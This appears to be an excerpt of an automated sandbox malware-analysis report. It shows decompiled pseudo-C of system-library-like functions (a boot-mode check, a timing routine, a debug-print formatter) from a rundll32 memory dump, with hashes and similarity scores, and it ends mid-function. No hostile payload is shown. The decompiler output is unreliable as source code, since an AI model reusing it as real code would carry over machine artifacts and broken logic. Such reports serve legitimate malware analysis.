                                                                                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                • Instruction Fuzzy Hash: 55919E393043419FEB64CE65C941B2BB7E5AF84714F28892EF599CB281E774F904CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E044851BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed short* _t63;
                                                                                                                				signed int _t64;
                                                                                                                				signed int _t65;
                                                                                                                				signed int _t67;
                                                                                                                				intOrPtr _t74;
                                                                                                                				intOrPtr _t84;
                                                                                                                				intOrPtr _t88;
                                                                                                                				intOrPtr _t94;
                                                                                                                				void* _t100;
                                                                                                                				void* _t103;
                                                                                                                				intOrPtr _t105;
                                                                                                                				signed int _t106;
                                                                                                                				short* _t108;
                                                                                                                				signed int _t110;
                                                                                                                				signed int _t113;
                                                                                                                				signed int* _t115;
                                                                                                                				signed short* _t117;
                                                                                                                				void* _t118;
                                                                                                                				void* _t119;
                                                                                                                
                                                                                                                				_push(0x80);
                                                                                                                				_push(0x44e05f0);
                                                                                                                				E0445D0E8(__ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                                                                				_t115 =  *(_t118 + 0xc);
                                                                                                                				 *(_t118 - 0x7c) = _t115;
                                                                                                                				 *((char*)(_t118 - 0x65)) = 0;
                                                                                                                				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                                                				_t113 = 0;
                                                                                                                				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                                                                				_t100 = __ecx;
                                                                                                                				if(_t100 == 0) {
                                                                                                                					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                                                					E0441EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                                					 *((char*)(_t118 - 0x65)) = 1;
                                                                                                                					_t63 =  *(_t118 - 0x90);
                                                                                                                					_t101 = _t63[2];
                                                                                                                					_t64 =  *_t63 & 0x0000ffff;
                                                                                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                                                					L20:
                                                                                                                					_t65 = _t64 >> 1;
                                                                                                                					L21:
                                                                                                                					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                                                                					if(_t108 == 0) {
                                                                                                                						L27:
                                                                                                                						 *_t115 = _t65 + 1;
                                                                                                                						_t67 = 0xc0000023;
                                                                                                                						L28:
                                                                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                                                                						L29:
                                                                                                                						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                                                                						E044853CA(0);
                                                                                                                						return E0445D130(0, _t113, _t115);
                                                                                                                					}
                                                                                                                					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                                                                						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                                                                							 *_t108 = 0;
                                                                                                                						}
                                                                                                                						goto L27;
                                                                                                                					}
                                                                                                                					 *_t115 = _t65;
                                                                                                                					_t115 = _t65 + _t65;
                                                                                                                					E0444F3E0(_t108, _t101, _t115);
                                                                                                                					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                                                                					_t67 = 0;
                                                                                                                					goto L28;
                                                                                                                				}
                                                                                                                				_t103 = _t100 - 1;
                                                                                                                				if(_t103 == 0) {
                                                                                                                					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                                                                					_t74 = E04423690(1, _t117, 0x43e1810, _t118 - 0x74);
                                                                                                                					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                                                                					_t101 = _t117[2];
                                                                                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                                                					if(_t74 < 0) {
                                                                                                                						_t64 =  *_t117 & 0x0000ffff;
                                                                                                                						_t115 =  *(_t118 - 0x7c);
                                                                                                                						goto L20;
                                                                                                                					}
                                                                                                                					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                                                                					_t115 =  *(_t118 - 0x7c);
                                                                                                                					goto L21;
                                                                                                                				}
                                                                                                                				if(_t103 == 1) {
                                                                                                                					_t105 = 4;
                                                                                                                					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                                                                					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                                                                					_push(_t118 - 0x70);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(_t105);
                                                                                                                					_push(_t118 - 0x78);
                                                                                                                					_push(0x6b);
                                                                                                                					 *((intOrPtr*)(_t118 - 0x64)) = E0444AA90();
                                                                                                                					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                                                					_t113 = L04424620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                                                                					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                                                                					if(_t113 != 0) {
                                                                                                                						_push(_t118 - 0x70);
                                                                                                                						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                                                                						_push(_t113);
                                                                                                                						_push(4);
                                                                                                                						_push(_t118 - 0x78);
                                                                                                                						_push(0x6b);
                                                                                                                						_t84 = E0444AA90();
                                                                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                                                                						if(_t84 < 0) {
                                                                                                                							goto L29;
                                                                                                                						}
                                                                                                                						_t110 = 0;
                                                                                                                						_t106 = 0;
                                                                                                                						while(1) {
                                                                                                                							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                                                                							 *(_t118 - 0x88) = _t106;
                                                                                                                							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                                                                							_t106 = _t106 + 1;
                                                                                                                						}
                                                                                                                						_t88 = E0448500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                                                                						_t119 = _t119 + 0x1c;
                                                                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                                                                						if(_t88 < 0) {
                                                                                                                							goto L29;
                                                                                                                						}
                                                                                                                						_t101 = _t118 - 0x3c;
                                                                                                                						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                                                                						goto L21;
                                                                                                                					}
                                                                                                                					_t67 = 0xc0000017;
                                                                                                                					goto L28;
                                                                                                                				}
                                                                                                                				_push(0);
                                                                                                                				_push(0x20);
                                                                                                                				_push(_t118 - 0x60);
                                                                                                                				_push(0x5a);
                                                                                                                				_t94 = E04449860();
                                                                                                                				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                                                                				if(_t94 < 0) {
                                                                                                                					goto L29;
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                                                                					_t101 = L"Legacy";
                                                                                                                					_push(6);
                                                                                                                				} else {
                                                                                                                					_t101 = L"UEFI";
                                                                                                                					_push(4);
                                                                                                                				}
                                                                                                                				_pop(_t65);
                                                                                                                				goto L21;
                                                                                                                			}























                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: Legacy$UEFI
                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                • Opcode ID: a68d0ad08203457f4171cd1ed3225a61f13862ceef4a2190300f814abcb1bae3
                                                                                                                • Instruction ID: 79bd4b482d183333097070c9d73a049bdd7a27f101252c8068f8df2d089102bc
                                                                                                                • Opcode Fuzzy Hash: a68d0ad08203457f4171cd1ed3225a61f13862ceef4a2190300f814abcb1bae3
                                                                                                                • Instruction Fuzzy Hash: AE516F71E00618AFEF25EFA9C940AAEB7F8FF44704F54442EE549EB251DA71A941CF10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0442B944(signed int* __ecx, char __edx) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				char _v28;
                                                                                                                				signed int _v32;
                                                                                                                				char _v36;
                                                                                                                				signed int _v40;
                                                                                                                				intOrPtr _v44;
                                                                                                                				signed int* _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				intOrPtr _v60;
                                                                                                                				intOrPtr _v64;
                                                                                                                				intOrPtr _v68;
                                                                                                                				intOrPtr _v72;
                                                                                                                				intOrPtr _v76;
                                                                                                                				char _v77;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t65;
                                                                                                                				intOrPtr _t67;
                                                                                                                				intOrPtr _t68;
                                                                                                                				char* _t73;
                                                                                                                				intOrPtr _t77;
                                                                                                                				intOrPtr _t78;
                                                                                                                				signed int _t82;
                                                                                                                				intOrPtr _t83;
                                                                                                                				void* _t87;
                                                                                                                				char _t88;
                                                                                                                				intOrPtr* _t89;
                                                                                                                				intOrPtr _t91;
                                                                                                                				void* _t97;
                                                                                                                				intOrPtr _t100;
                                                                                                                				void* _t102;
                                                                                                                				void* _t107;
                                                                                                                				signed int _t108;
                                                                                                                				intOrPtr* _t112;
                                                                                                                				void* _t113;
                                                                                                                				intOrPtr* _t114;
                                                                                                                				intOrPtr _t115;
                                                                                                                				intOrPtr _t116;
                                                                                                                				intOrPtr _t117;
                                                                                                                				signed int _t118;
                                                                                                                				void* _t130;
                                                                                                                
                                                                                                                				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                                                                				_v8 =  *0x44fd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                                                                				_t112 = __ecx;
                                                                                                                				_v77 = __edx;
                                                                                                                				_v48 = __ecx;
                                                                                                                				_v28 = 0;
                                                                                                                				_t5 = _t112 + 0xc; // 0x575651ff
                                                                                                                				_t105 =  *_t5;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0;
                                                                                                                				if(_t105 == 0) {
                                                                                                                					_t50 = _t112 + 4; // 0x5de58b5b
                                                                                                                					_t60 =  *__ecx |  *_t50;
                                                                                                                					if(( *__ecx |  *_t50) != 0) {
                                                                                                                						 *__ecx = 0;
                                                                                                                						__ecx[1] = 0;
                                                                                                                						if(E04427D50() != 0) {
                                                                                                                							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                						} else {
                                                                                                                							_t65 = 0x7ffe0386;
                                                                                                                						}
                                                                                                                						if( *_t65 != 0) {
                                                                                                                							E044D8CD6(_t112);
                                                                                                                						}
                                                                                                                						_push(0);
                                                                                                                						_t52 = _t112 + 0x10; // 0x778df98b
                                                                                                                						_push( *_t52);
                                                                                                                						_t60 = E04449E20();
                                                                                                                					}
                                                                                                                					L20:
                                                                                                                					_pop(_t107);
                                                                                                                					_pop(_t113);
                                                                                                                					_pop(_t87);
                                                                                                                					return E0444B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                                                                				}
                                                                                                                				_t8 = _t112 + 8; // 0x8b000cc2
                                                                                                                				_t67 =  *_t8;
                                                                                                                				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                                                                				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                                                                				_t108 =  *(_t67 + 0x14);
                                                                                                                				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                                                                				_t105 = 0x2710;
                                                                                                                				asm("sbb eax, edi");
                                                                                                                				_v44 = _t88;
                                                                                                                				_v52 = _t108;
                                                                                                                				_t60 = E0444CE00(_t97, _t68, 0x2710, 0);
                                                                                                                				_v56 = _t60;
                                                                                                                				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                                                                					L3:
                                                                                                                					 *(_t112 + 0x44) = _t60;
                                                                                                                					_t105 = _t60 * 0x2710 >> 0x20;
                                                                                                                					 *_t112 = _t88;
                                                                                                                					 *(_t112 + 4) = _t108;
                                                                                                                					_v20 = _t60 * 0x2710;
                                                                                                                					_v16 = _t60 * 0x2710 >> 0x20;
                                                                                                                					if(_v77 != 0) {
                                                                                                                						L16:
                                                                                                                						_v36 = _t88;
                                                                                                                						_v32 = _t108;
                                                                                                                						if(E04427D50() != 0) {
                                                                                                                							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                						} else {
                                                                                                                							_t73 = 0x7ffe0386;
                                                                                                                						}
                                                                                                                						if( *_t73 != 0) {
                                                                                                                							_t105 = _v40;
                                                                                                                							E044D8F6A(_t112, _v40, _t88, _t108);
                                                                                                                						}
                                                                                                                						_push( &_v28);
                                                                                                                						_push(0);
                                                                                                                						_push( &_v36);
                                                                                                                						_t48 = _t112 + 0x10; // 0x778df98b
                                                                                                                						_push( *_t48);
                                                                                                                						_t60 = E0444AF60();
                                                                                                                						goto L20;
                                                                                                                					} else {
                                                                                                                						_t89 = 0x7ffe03b0;
                                                                                                                						do {
                                                                                                                							_t114 = 0x7ffe0010;
                                                                                                                							do {
                                                                                                                								_t77 =  *0x44f8628; // 0x0
                                                                                                                								_v68 = _t77;
                                                                                                                								_t78 =  *0x44f862c; // 0x0
                                                                                                                								_v64 = _t78;
                                                                                                                								_v72 =  *_t89;
                                                                                                                								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                                                                								while(1) {
                                                                                                                									_t105 =  *0x7ffe000c;
                                                                                                                									_t100 =  *0x7ffe0008;
                                                                                                                									if(_t105 ==  *_t114) {
                                                                                                                										goto L8;
                                                                                                                									}
                                                                                                                									asm("pause");
                                                                                                                								}
                                                                                                                								L8:
                                                                                                                								_t89 = 0x7ffe03b0;
                                                                                                                								_t115 =  *0x7ffe03b0;
                                                                                                                								_t82 =  *0x7FFE03B4;
                                                                                                                								_v60 = _t115;
                                                                                                                								_t114 = 0x7ffe0010;
                                                                                                                								_v56 = _t82;
                                                                                                                							} while (_v72 != _t115 || _v76 != _t82);
                                                                                                                							_t83 =  *0x44f8628; // 0x0
                                                                                                                							_t116 =  *0x44f862c; // 0x0
                                                                                                                							_v76 = _t116;
                                                                                                                							_t117 = _v68;
                                                                                                                						} while (_t117 != _t83 || _v64 != _v76);
                                                                                                                						asm("sbb edx, [esp+0x24]");
                                                                                                                						_t102 = _t100 - _v60 - _t117;
                                                                                                                						_t112 = _v48;
                                                                                                                						_t91 = _v44;
                                                                                                                						asm("sbb edx, eax");
                                                                                                                						_t130 = _t105 - _v52;
                                                                                                                						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                                                                							_t88 = _t102 - _t91;
                                                                                                                							asm("sbb edx, edi");
                                                                                                                							_t108 = _t105;
                                                                                                                						} else {
                                                                                                                							_t88 = 0;
                                                                                                                							_t108 = 0;
                                                                                                                						}
                                                                                                                						goto L16;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					if( *(_t112 + 0x44) == _t60) {
                                                                                                                						goto L20;
                                                                                                                					}
                                                                                                                					goto L3;
                                                                                                                				}
                                                                                                                			}
















































                                                                                                                0x0442ba7c
                                                                                                                0x0442bb0a
                                                                                                                0x0442bb0d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0442bb0f

                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0442B9A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 885266447-0
                                                                                                                • Opcode ID: cfc961fd71d9daa749f0ac974a62b1c91b426a402033c266ee87b7ec6c9351b9
                                                                                                                • Instruction ID: 111886957ce261aed17779d048dec16f8a42c8f158af5a5f373eb08737a21d6b
                                                                                                                • Opcode Fuzzy Hash: cfc961fd71d9daa749f0ac974a62b1c91b426a402033c266ee87b7ec6c9351b9
                                                                                                                • Instruction Fuzzy Hash: 72515771A083A0DFDB20DF29C580A2BBBE5FB88604F94496FE59587345E771F844CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0440B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                                                                				signed int _t65;
                                                                                                                				signed short _t69;
                                                                                                                				intOrPtr _t70;
                                                                                                                				signed short _t85;
                                                                                                                				void* _t86;
                                                                                                                				signed short _t89;
                                                                                                                				signed short _t91;
                                                                                                                				intOrPtr _t92;
                                                                                                                				intOrPtr _t97;
                                                                                                                				intOrPtr* _t98;
                                                                                                                				signed short _t99;
                                                                                                                				signed short _t101;
                                                                                                                				void* _t102;
                                                                                                                				char* _t103;
                                                                                                                				signed short _t104;
                                                                                                                				intOrPtr* _t110;
                                                                                                                				void* _t111;
                                                                                                                				void* _t114;
                                                                                                                				intOrPtr* _t115;
                                                                                                                
                                                                                                                				_t109 = __esi;
                                                                                                                				_t108 = __edi;
                                                                                                                				_t106 = __edx;
                                                                                                                				_t95 = __ebx;
                                                                                                                				_push(0x90);
                                                                                                                				_push(0x44df7a8);
                                                                                                                				E0445D0E8(__ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                                                                				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                                                                				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                                                                				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                                                                				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                                                                				if(__edx == 0xffffffff) {
                                                                                                                					L6:
                                                                                                                					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                                                                					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                                                                					__eflags = _t65 & 0x00000002;
                                                                                                                					if((_t65 & 0x00000002) != 0) {
                                                                                                                						L3:
                                                                                                                						L4:
                                                                                                                						return E0445D130(_t95, _t108, _t109);
                                                                                                                					}
                                                                                                                					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                                                                					_t108 = 0;
                                                                                                                					_t109 = 0;
                                                                                                                					_t95 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                					while(1) {
                                                                                                                						__eflags = _t95 - 0x200;
                                                                                                                						if(_t95 >= 0x200) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						E0444D000(0x80);
                                                                                                                						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                                                                						_t108 = _t115;
                                                                                                                						_t95 = _t95 - 0xffffff80;
                                                                                                                						_t17 = _t114 - 4;
                                                                                                                						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                                                                						__eflags =  *_t17;
                                                                                                                						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                                                						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                                                						_t102 = _t110 + 1;
                                                                                                                						do {
                                                                                                                							_t85 =  *_t110;
                                                                                                                							_t110 = _t110 + 1;
                                                                                                                							__eflags = _t85;
                                                                                                                						} while (_t85 != 0);
                                                                                                                						_t111 = _t110 - _t102;
                                                                                                                						_t21 = _t95 - 1; // -129
                                                                                                                						_t86 = _t21;
                                                                                                                						__eflags = _t111 - _t86;
                                                                                                                						if(_t111 > _t86) {
                                                                                                                							_t111 = _t86;
                                                                                                                						}
                                                                                                                						E0444F3E0(_t108, _t106, _t111);
                                                                                                                						_t115 = _t115 + 0xc;
                                                                                                                						_t103 = _t111 + _t108;
                                                                                                                						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                                                                						_t89 = _t95 - _t111;
                                                                                                                						__eflags = _t89;
                                                                                                                						_push(0);
                                                                                                                						if(_t89 == 0) {
                                                                                                                							L15:
                                                                                                                							_t109 = 0xc000000d;
                                                                                                                							goto L16;
                                                                                                                						} else {
                                                                                                                							__eflags = _t89 - 0x7fffffff;
                                                                                                                							if(_t89 <= 0x7fffffff) {
                                                                                                                								L16:
                                                                                                                								 *(_t114 - 0x94) = _t109;
                                                                                                                								__eflags = _t109;
                                                                                                                								if(_t109 < 0) {
                                                                                                                									__eflags = _t89;
                                                                                                                									if(_t89 != 0) {
                                                                                                                										 *_t103 = 0;
                                                                                                                									}
                                                                                                                									L26:
                                                                                                                									 *(_t114 - 0xa0) = _t109;
                                                                                                                									 *(_t114 - 4) = 0xfffffffe;
                                                                                                                									__eflags = _t109;
                                                                                                                									if(_t109 >= 0) {
                                                                                                                										L31:
                                                                                                                										_t98 = _t108;
                                                                                                                										_t39 = _t98 + 1; // 0x1
                                                                                                                										_t106 = _t39;
                                                                                                                										do {
                                                                                                                											_t69 =  *_t98;
                                                                                                                											_t98 = _t98 + 1;
                                                                                                                											__eflags = _t69;
                                                                                                                										} while (_t69 != 0);
                                                                                                                										_t99 = _t98 - _t106;
                                                                                                                										__eflags = _t99;
                                                                                                                										L34:
                                                                                                                										_t70 =  *[fs:0x30];
                                                                                                                										__eflags =  *((char*)(_t70 + 2));
                                                                                                                										if( *((char*)(_t70 + 2)) != 0) {
                                                                                                                											L40:
                                                                                                                											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                                                                											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                                                                											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                                                                											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                                                                											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                                                                											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                                                                											 *(_t114 - 4) = 1;
                                                                                                                											_push(_t114 - 0x74);
                                                                                                                											L0445DEF0(_t99, _t106);
                                                                                                                											 *(_t114 - 4) = 0xfffffffe;
                                                                                                                											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                                                											goto L3;
                                                                                                                										}
                                                                                                                										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                                                                										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                                                                											goto L40;
                                                                                                                										}
                                                                                                                										_push( *((intOrPtr*)(_t114 + 8)));
                                                                                                                										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                                                                										_push(_t99 & 0x0000ffff);
                                                                                                                										_push(_t108);
                                                                                                                										_push(1);
                                                                                                                										_t101 = E0444B280();
                                                                                                                										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                                                                										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                                                                											__eflags = _t101 - 0x80000003;
                                                                                                                											if(_t101 == 0x80000003) {
                                                                                                                												E0444B7E0(1);
                                                                                                                												_t101 = 0;
                                                                                                                												__eflags = 0;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                                                										goto L4;
                                                                                                                									}
                                                                                                                									__eflags = _t109 - 0x80000005;
                                                                                                                									if(_t109 == 0x80000005) {
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								 *(_t114 - 0x90) = 0;
                                                                                                                								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                                                                								_t91 = E0444E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                                                                								_t115 = _t115 + 0x10;
                                                                                                                								_t104 = _t91;
                                                                                                                								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                                                                								__eflags = _t104;
                                                                                                                								if(_t104 < 0) {
                                                                                                                									L21:
                                                                                                                									_t109 = 0x80000005;
                                                                                                                									 *(_t114 - 0x90) = 0x80000005;
                                                                                                                									L22:
                                                                                                                									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                                                                									L23:
                                                                                                                									 *(_t114 - 0x94) = _t109;
                                                                                                                									goto L26;
                                                                                                                								}
                                                                                                                								__eflags = _t104 - _t92;
                                                                                                                								if(__eflags > 0) {
                                                                                                                									goto L21;
                                                                                                                								}
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L22;
                                                                                                                								}
                                                                                                                								goto L23;
                                                                                                                							}
                                                                                                                							goto L15;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					__eflags = _t109;
                                                                                                                					if(_t109 >= 0) {
                                                                                                                						goto L31;
                                                                                                                					}
                                                                                                                					__eflags = _t109 - 0x80000005;
                                                                                                                					if(_t109 != 0x80000005) {
                                                                                                                						goto L31;
                                                                                                                					}
                                                                                                                					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                                                                					_t38 = _t95 - 1; // -129
                                                                                                                					_t99 = _t38;
                                                                                                                					goto L34;
                                                                                                                				}
                                                                                                                				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                                					__eflags = __edx - 0x65;
                                                                                                                					if(__edx != 0x65) {
                                                                                                                						goto L2;
                                                                                                                					}
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				L2:
                                                                                                                				_push( *((intOrPtr*)(_t114 + 8)));
                                                                                                                				_push(_t106);
                                                                                                                				if(E0444A890() != 0) {
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				goto L3;
                                                                                                                			}























                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _vswprintf_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 677850445-0
                                                                                                                • Opcode ID: fca8ea75d416e97955108c495778a3114aa9fa00ef796582ef1965d8a43af04e
                                                                                                                • Instruction ID: 41afa42d8cebacb1200687fa389ba97bcc79ded342c572224eb7af38a2ab02e9
                                                                                                                • Opcode Fuzzy Hash: fca8ea75d416e97955108c495778a3114aa9fa00ef796582ef1965d8a43af04e
                                                                                                                • Instruction Fuzzy Hash: C651D075E006598EEF35CF748844BAEBBB0FF40714F1081AFD85AAB382D77069458B96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E04432581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v16;
                                                                                                                				unsigned int _v24;
                                                                                                                				void* _v28;
                                                                                                                				signed int _v32;
                                                                                                                				unsigned int _v36;
                                                                                                                				void* _v37;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				intOrPtr _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _t239;
                                                                                                                				signed int _t243;
                                                                                                                				void* _t244;
                                                                                                                				void* _t246;
                                                                                                                				signed int _t248;
                                                                                                                				signed int _t249;
                                                                                                                				void* _t251;
                                                                                                                				signed int _t258;
                                                                                                                				signed int _t260;
                                                                                                                				intOrPtr _t262;
                                                                                                                				signed int _t265;
                                                                                                                				signed int _t272;
                                                                                                                				signed int _t275;
                                                                                                                				signed int _t283;
                                                                                                                				signed int _t289;
                                                                                                                				signed int _t291;
                                                                                                                				void* _t293;
                                                                                                                				void* _t296;
                                                                                                                				void* _t297;
                                                                                                                				void* _t299;
                                                                                                                				signed int _t300;
